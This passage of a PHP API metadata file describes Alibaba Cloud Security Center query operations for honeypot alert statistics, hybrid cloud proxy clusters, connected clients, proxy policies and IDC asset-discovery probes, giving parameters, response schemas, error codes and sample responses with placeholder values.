parameter is returned only when the request parameter **StatisticsKeyType** is set to **uuid**.', 'type' => 'string', 'example' => 'i-p0whhoba24wd28p8****', 'title' => ''], 'Count' => ['description' => 'The total number of security alerts on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '8793', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query top 5 vPCs or assets by security alert count', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHoneyPotSuspStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9E3969FA-5ACC-4256-9FDE-BB6918CD0410\\",\\n \\"SuspHoneyPotStatisticsResponse\\": [\\n {\\n \\"Type\\": \\"vpcInstanceId\\",\\n \\"VpcId\\": \\"vpc-p0wwdsuutdyu1ygkt****\\",\\n \\"VpcName\\": \\"abc01\\",\\n \\"InstanceName\\": \\"abc-launch-advisor\\",\\n \\"InstanceId\\": \\"i-p0whhoba24wd28p8****\\",\\n \\"Count\\": 8793\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeHybridProxyClusterList' => [ 'summary' => 'Queries proxy clusters by using paging.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'ClusterList' => [ 'description' => 'The list of clusters.', 'type' => 'array', 'items' => [ 'description' => 'The list of clusters.', 'type' => 'object', 'properties' => [ 'ClusterName' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'example' => 'idc-sas-proxy', 'title' => ''], 'ProxyCount' => ['description' => 'The number of proxy nodes.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ClientCount' => ['description' => 'The number of Security Center clients connected to the current cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Remark' => ['description' => 'The remarks of the proxy cluster.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'InstallCommand' => ['description' => 'The installation command for the current proxy cluster node.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'AuthKey' => ['description' => 'The credential ID for cluster authentication.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'AuthKeySecret' => ['description' => 'The credential key for cluster authentication.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'Status' => ['description' => 'The running status of the cluster.', 'type' => 'string', 'example' => 'offline', 'title' => ''], 'Ip' => ['description' => 'The access address of the cluster, which can be an IP address or a domain name.', 'type' => 'string', 'example' => '114.115.XXX.XXX', 'title' => ''], 'LastHeartTime' => ['description' => 'The timestamp of the last heartbeat from the cluster. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1608304654000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of entries displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C1A36413-50B2-5B2F-843F-EB14C582713F', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query proxy clusters by using paging', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyClusterList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHybridProxyClusterList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ClusterList\\": [\\n {\\n \\"ClusterName\\": \\"idc-sas-proxy\\",\\n \\"ProxyCount\\": 3,\\n \\"ClientCount\\": 10,\\n \\"Remark\\": \\"test\\",\\n \\"InstallCommand\\": \\"test\\",\\n \\"AuthKey\\": \\"test\\",\\n \\"AuthKeySecret\\": \\"test\\",\\n \\"Status\\": \\"offline\\",\\n \\"Ip\\": \\"114.115.XXX.XXX\\",\\n \\"LastHeartTime\\": 1608304654000\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 20\\n },\\n \\"RequestId\\": \\"C1A36413-50B2-5B2F-843F-EB14C582713F\\"\\n}","type":"json"}]', ], 'DescribeHybridProxyLinkedClientList' => [ 'summary' => 'Queries the list of clients connected to a specified hybrid cloud proxy by paging. This operation is part of the hybrid cloud proxy feature.', 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ProxyUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the proxy node. You can call the DescribeHybridProxyList operation to obtain this value.', 'type' => 'string', 'required' => false, 'example' => 'inet-proxy-3bb11fad-37d6-4aee-9c37-b0ad1612XXXX', 'title' => ''], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster. You can view the proxy cluster name in the console.', 'type' => 'string', 'required' => false, 'example' => 'office-proxy', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The unique key of the Security Center agent. You can call an asset query operation to obtain the UUID of the Security Center agent installed on the server.', 'type' => 'string', 'required' => false, 'example' => '80d2f7d6-31a9-4d7f-8ff4-7ecc42f89ca****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The returned list.', 'type' => 'array', 'items' => [ 'description' => 'The returned object.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-bp1a69mvjujbakxu****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'Status' => ['description' => 'The status of the client.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the server.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'RegionName' => ['description' => 'The region name of the server.', 'type' => 'string', 'example' => 'cn-qingdao', 'title' => ''], 'GroupName' => ['description' => 'The name of the server group.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'Tag' => ['description' => 'The tag name of the asset.', 'type' => 'string', 'example' => 'latest', 'title' => ''], 'VendorName' => ['description' => 'The name of the service provider.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'Os' => ['description' => 'The name of the operating system.', 'type' => 'string', 'example' => 'centos-xxx', 'title' => ''], 'OsName' => ['description' => 'The operating system name of the asset.', 'type' => 'string', 'example' => 'centos', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page when paging is used.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'B01B804F-947C-5623-B050-1C8FDFA796CF', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query connected clients by paging', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyLinkedClientList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHybridProxyLinkedClientList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"InstanceId\\": \\"i-bp1a69mvjujbakxu****\\",\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"Status\\": \\"online\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"RegionName\\": \\"cn-qingdao\\",\\n \\"GroupName\\": \\"default\\",\\n \\"Tag\\": \\"latest\\",\\n \\"VendorName\\": \\"ALIYUN\\",\\n \\"Os\\": \\"centos-xxx\\",\\n \\"OsName\\": \\"centos\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 10\\n },\\n \\"RequestId\\": \\"B01B804F-947C-5623-B050-1C8FDFA796CF\\"\\n}","type":"json"}]', ], 'DescribeHybridProxyList' => [ 'summary' => 'Queries the list of proxy nodes that have been deployed in a specified proxy cluster by paging.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '151386', 'abilityTreeNodes' => ['FEATUREsasON13NY'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'required' => false, 'example' => 'idc-sas-proxy', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The number of the page to return in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ProxyList' => [ 'description' => 'The proxy cluster list.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 'i-uf61q03boqhhmeai1XXX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'example' => 'dev', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '47.76.XXX.XXX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.23.XXX.XXX', 'title' => ''], 'Status' => ['description' => 'The running status of the proxy machine. Valid values:'."\n" ."\n" .'- **online**: online'."\n" .'- **offline**: offline.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the Security Center agent deployed on the proxy instance.', 'type' => 'string', 'example' => '59a9d158-b2f0-4766-a893-ae67b9432721', 'title' => ''], 'ClientCount' => ['description' => 'The number of Security Center agents connected to the proxy instance.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ProxyUuid' => ['description' => 'The unique key that identifies the proxy node.', 'type' => 'string', 'example' => 'inet-proxy-3bb11fad-37d6-4aee-9c37-b0ad1612a18e', 'title' => ''], 'CurrentVersion' => ['description' => 'The version of the proxy instance.', 'type' => 'string', 'example' => 'proxy_01_05', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '75801E5D-E2EB-5C1D-B65D-2F7D2B00EF93', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query proxy machines by paging', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHybridProxyList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 20\\n },\\n \\"ProxyList\\": [\\n {\\n \\"InstanceId\\": \\"i-uf61q03boqhhmeai1XXX\\",\\n \\"InstanceName\\": \\"dev\\",\\n \\"InternetIp\\": \\"47.76.XXX.XXX\\",\\n \\"IntranetIp\\": \\"172.23.XXX.XXX\\",\\n \\"Status\\": \\"online\\",\\n \\"Uuid\\": \\"59a9d158-b2f0-4766-a893-ae67b9432721\\",\\n \\"ClientCount\\": 10,\\n \\"ProxyUuid\\": \\"inet-proxy-3bb11fad-37d6-4aee-9c37-b0ad1612a18e\\",\\n \\"CurrentVersion\\": \\"proxy_01_05\\"\\n }\\n ],\\n \\"RequestId\\": \\"75801E5D-E2EB-5C1D-B65D-2F7D2B00EF93\\"\\n}","type":"json"}]', ], 'DescribeHybridProxyPolicy' => [ 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster. You can view the cluster name in the console.', 'type' => 'string', 'required' => true, 'example' => 'test-idc', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'PolicyList' => [ 'description' => 'The list of data collection configurations for the proxy cluster.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'PolicyType' => ['description' => 'The policy type. Valid values:'."\n" ."\n" .'- **limitFrequency**: collection frequency control'."\n" .'- **limitBandWidth**: collection bandwidth control.', 'type' => 'string', 'example' => 'limitBandWidth', 'title' => ''], 'Info' => [ 'description' => 'The policy information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The configured policy type. Valid values:'."\n" ."\n" .'- **file**: file data collection'."\n" .'- **net**: network data collection'."\n" .'- **process**: process data collection.', 'type' => 'string', 'example' => 'file', 'title' => ''], 'Config' => ['description' => 'The specific value of the policy configuration.', 'type' => 'string', 'example' => '10', 'title' => ''], 'FileName' => ['description' => 'The file to which the data intercepted by the proxy cluster policy is written.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F7A1B40A-7EED-55A0-BCBC-2F83A486F0AB', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query data collection configuration of a proxy cluster', 'summary' => 'Queries the data collection configuration of a specified proxy cluster.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHybridProxyPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"PolicyList\\": [\\n {\\n \\"PolicyType\\": \\"limitBandWidth\\",\\n \\"Info\\": [\\n {\\n \\"Type\\": \\"file\\",\\n \\"Config\\": \\"10\\",\\n \\"FileName\\": \\"test\\"\\n }\\n ]\\n }\\n ],\\n \\"Count\\": 1,\\n \\"RequestId\\": \\"F7A1B40A-7EED-55A0-BCBC-2F83A486F0AB\\"\\n}","type":"json"}]', ], 'DescribeIdcAssetCriteria' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The fuzzy match value entered when querying assets.', 'type' => 'string', 'required' => false, 'example' => 'testwww', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'Indicates whether the corresponding IP address is valid. Valid values:'."\n" .'- **0**: valid'."\n" .'- **1**: ignored'."\n" .'- **2**: invalid'."\n" .'- **3**: expired'."\n" .'- **4**: probe does not exist.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911****', 'title' => ''], 'CriteriaList' => [ 'description' => 'The information about the asset search conditions.', 'type' => 'array', 'items' => [ 'description' => 'The information about the asset search conditions.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the search condition. Valid values:'."\n" ."\n" .'- **input**: You must manually enter the search field.'."\n" .'- **select**: You must select a child class of the search condition from the drop-down list.', 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the corresponding search condition.', 'type' => 'string', 'example' => 'scannedIp', 'title' => ''], 'Values' => ['description' => 'The specific asset property values that correspond to the entered fuzzy match value.', 'type' => 'string', 'example' => '1.1.1.*', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'IDC probe scan asset search conditions', 'summary' => 'Queries the fuzzy match search conditions for asset properties that can be displayed when you query IDC assets discovered by scanning.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeIdcAssetCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeIdcAssetCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"11C96623-E106-59C9-866D-A6C82911****\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"scannedIp\\",\\n \\"Values\\": \\"1.1.1.*\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeIdcProbeList' => [ 'summary' => 'Retrieves the list of IDC probe instances used for asset discovery in the multi-cloud configuration management feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92094', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when paging. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: 1, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The usage status of the probe. Valid values:'."\n" ."\n" .'- **0**: enabled'."\n" .'- **1**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'IdcName', 'in' => 'query', 'schema' => ['description' => 'The name of the IDC.', 'type' => 'string', 'required' => false, 'example' => '3K IDC', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '0C8487EF-50C2-54BB-8634-10F8C35D****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page when paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], ], 'title' => '', 'example' => '', ], 'IdcProbes' => [ 'description' => 'The list of IDC probes.', 'type' => 'array', 'items' => [ 'description' => 'The list of IDC probes.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The usage status of the probe. Valid values:'."\n" ."\n" .'- **0**: enabled'."\n" .'- **1**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'LinuxPort' => ['description' => 'The Linux port.', 'type' => 'string', 'example' => '22', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '47.98.*.*', 'title' => ''], 'IdcRegion' => ['description' => 'The region.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 'i-xxxxx', 'title' => ''], 'IpSegments' => ['description' => 'The IP address range.', 'type' => 'string', 'example' => '192.168.1.0/24', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the instance.', 'type' => 'string', 'example' => '10.68.*.*', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'inet-eae02b9a-1dbd-44a6-844c-69072b27****', 'title' => ''], 'IntervalPeriod' => ['description' => 'The scan interval.', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'oraclexxx', 'title' => ''], 'PeriodUnit' => ['description' => 'The unit of the scan interval. Valid values:'."\n" .'- **day**: day.'."\n" .'- **hour**: hour.', 'type' => 'string', 'example' => 'day', 'title' => ''], 'WinPort' => ['description' => 'The Windows port.', 'type' => 'string', 'example' => '3389', 'title' => ''], 'IdcName' => ['description' => 'The IDC name.', 'type' => 'string', 'example' => '3K IDC', 'title' => ''], 'ServiceStatus' => ['description' => 'The service status of the probe. Valid values:'."\n" ."\n" .'- **0**: Normal'."\n" .'- **1**: abnormal.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query IDC probe list for asset discovery', 